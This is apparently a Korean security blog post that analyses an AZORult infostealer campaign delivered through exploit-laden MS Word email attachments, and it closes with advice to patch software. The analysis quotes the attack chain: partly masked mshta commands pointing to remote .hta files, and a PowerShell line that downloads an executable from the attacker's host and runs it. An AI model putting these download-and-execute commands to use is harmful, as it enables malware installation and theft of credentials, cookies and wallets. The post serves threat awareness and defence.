MS Word 취약점을 이용한 AZORult 악성코드 유포 주의 (2019.1.18)
벌새::Analysis최근 국내에서 메일 첨부 파일로 전파된 악성 MS Word 문서를 실행할 경우 취약점(Exploit)을 통해 AZORult 악성코드에 감염되는 사례가 확인되어 살펴보도록 하겠습니다.
mshta h**p://bit.ly/2Mjm*** &AAAAAAAAAAAAAAAC→ h**p://vektorex.com/****/boss39Report.htamshta http://bit.ly/2Mg3*** &AAAAAAAAAAAAAAAC→ h**p://vektorex.com/****/bill304Report.htamshta http://bit.ly/2MfA*** &AAAAAAAAAAAAAAAC→ h**p://vektorex.com/****/edyiReport.hta
bit.ly 단축 URL 서비스를 통해 연결된 웹 페이지에서는 특정 .hta 파일을 실행하도록 구성되어 있습니다.
.hta 파일(SHA-1 : 8c7d6154ec4a95ef69cc33846abf9f5f374a0541)에서는 Windows Powershell 기능을 이용하여 특정 .exe 파일 다운로드를 하도록 구성되어 있는 스크립트가 포함되어 있습니다.
"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('h**p://vektorex.com/****/650890977.exe','%temp%\ufsdfs.exe'); Start '%temp%\ufsdfs.exe'
실행된 "%Temp%\ufsdfs.exe" 악성 파일은 "C:\Users\%UserName%\AppData\Roaming\oihsnfg\bsyguh.exe" 파일명으로 자기 자신을 복제한 후 실행합니다.
해당 C&C 서버에서는 AZORult 악성코드 계열임을 알 수 있으며, 2019년 1월 14일경부터 운영되고 있는 것으로 추정됩니다.
감염된 PC 환경에서는 "C:\Users\%UserName%\AppData\Local\Temp\2fda" 폴더를 생성하여 내부에 Mozilla Firefox 웹 브라우저 관련 파일 등의 다수의 모듈을 추가 생성하여 웹 브라우저에 저장된 인증서, 쿠키, 계정 정보 등을 수집하여 외부로 유출할 수 있습니다.
그 외에도 특정 위치에 존재하는 파일 수집, FTP / 메신저 / 이메일 계정 정보 수집, 암호 화폐 지갑 탈취, PC 정보 수집, 추가적인 파일 다운로드 등의 다양한 악의적 기능을 수행하며, 과거부터 지속적인 빌더(Builder) 버전 업데이트를 통해 기능을 추가하고 있는 것으로 보입니다.
그러므로 AZORult 악성코드에 감염되지 않기 위해서는 Windows, 웹 브라우저, Adobe Flash Player, MS Office 프로그램에 대한 최신 보안 패치를 꾸준히 업데이트하시기 바라며, 메일을 통해 수신된 첨부 파일 실행 시에는 항상 주의하여 피해를 당하는 일이 없도록 하시기 바랍니다.
'벌새::Analysis' 카테고리의 다른 글
디스크 포맷과 파일 삭제를 시도하는 Mongolock 랜섬웨어 정보 (2019.3.16) (5) | 2019.03.16 |
---|---|
MS Office DDE(동적 데이터 교환) 필드를 악용한 Morty 스파이웨어 유포 주의 (2019.2.12) (1) | 2019.02.12 |
MS Word 취약점을 이용한 AZORult 악성코드 유포 주의 (2019.1.18) (1) | 2019.01.18 |
KMSAuto Net 정품 인증툴에 포함된 NanoCore RAT 악성코드 주의 (2018.11.3) (14) | 2018.11.03 |
Windows Update.exe 파일을 찾을 수 없다는 메시지 해결 방법 (2018.10.21) (12) | 2018.10.21 |
엑셀(Excel) 파일로 위장한 정보 수집 악성코드 유포 주의 (2018.9.29) (2) | 2018.09.29 |
댓글을 달아 주세요
결국은 취약점을 막아야되는군요